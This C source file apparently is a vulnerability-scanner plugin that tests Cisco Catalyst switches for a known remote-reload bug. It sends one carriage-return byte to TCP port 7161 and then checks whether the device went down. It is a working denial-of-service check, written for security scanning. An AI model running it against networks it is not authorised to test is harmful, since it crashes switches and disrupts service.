/*
 *
 * Cisco DoS
 *
 */

#include <includes.h>


#define NAME "Cisco Catalyst Supervisor Remote Reload"
#define DESC "\
A software bug (Cisco bug ID CSCdi74333) allows remote TCP/IP users to cause\n\
reloads of Cisco Catalyst LAN switches running Catalyst 5000 supervisor\n\
software versions from 1.0 through 2.1(5). The affected software was last\n\
shipped with new units in early 1997. In addition to the Catalyst 5xxx\n\
series, some, but not all, Catalyst 29xx family switches may run the\n\
affected software;\n\
Risk factor : high"
#define COPYRIGHT "found by the ISS-XForce"
#define SUMM "denial of service against Cisco routers"


int get_open_port(struct arglist * args);
int test_open_port(struct arglist * args);
PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_DENIAL);
	plug_set_family(desc, "Denial of Service");
	return(0);
}

PlugExport int plugin_run(struct arglist * args);
PlugExport int plugin_run(struct arglist * args)
{
 int soc;
 int dead = 0;
 if(host_get_port_state(args, 7161) >= 0)
 {
  soc = open_sock_tcp(args, 7161);
  if(soc >= 0)
  {
   char buf;
   buf = 13;
   send(soc, &buf, 1, 0);
   shutdown(soc, 2);
   close(soc);
   soc = open_sock_tcp(args, 7161);
   if(soc > 0)
   {
    shutdown(soc, 2);
    close(soc);
   } else dead++;
    
   if(dead)
   {
    post_hole(args, 7161, "\
The remote router can be rebooted \n\
easily by connecting to this port and \n\
by sending a carriage return character \n\
Solution : Contact Cisco for a patch");
    }
   }
  }
 return(0);
}

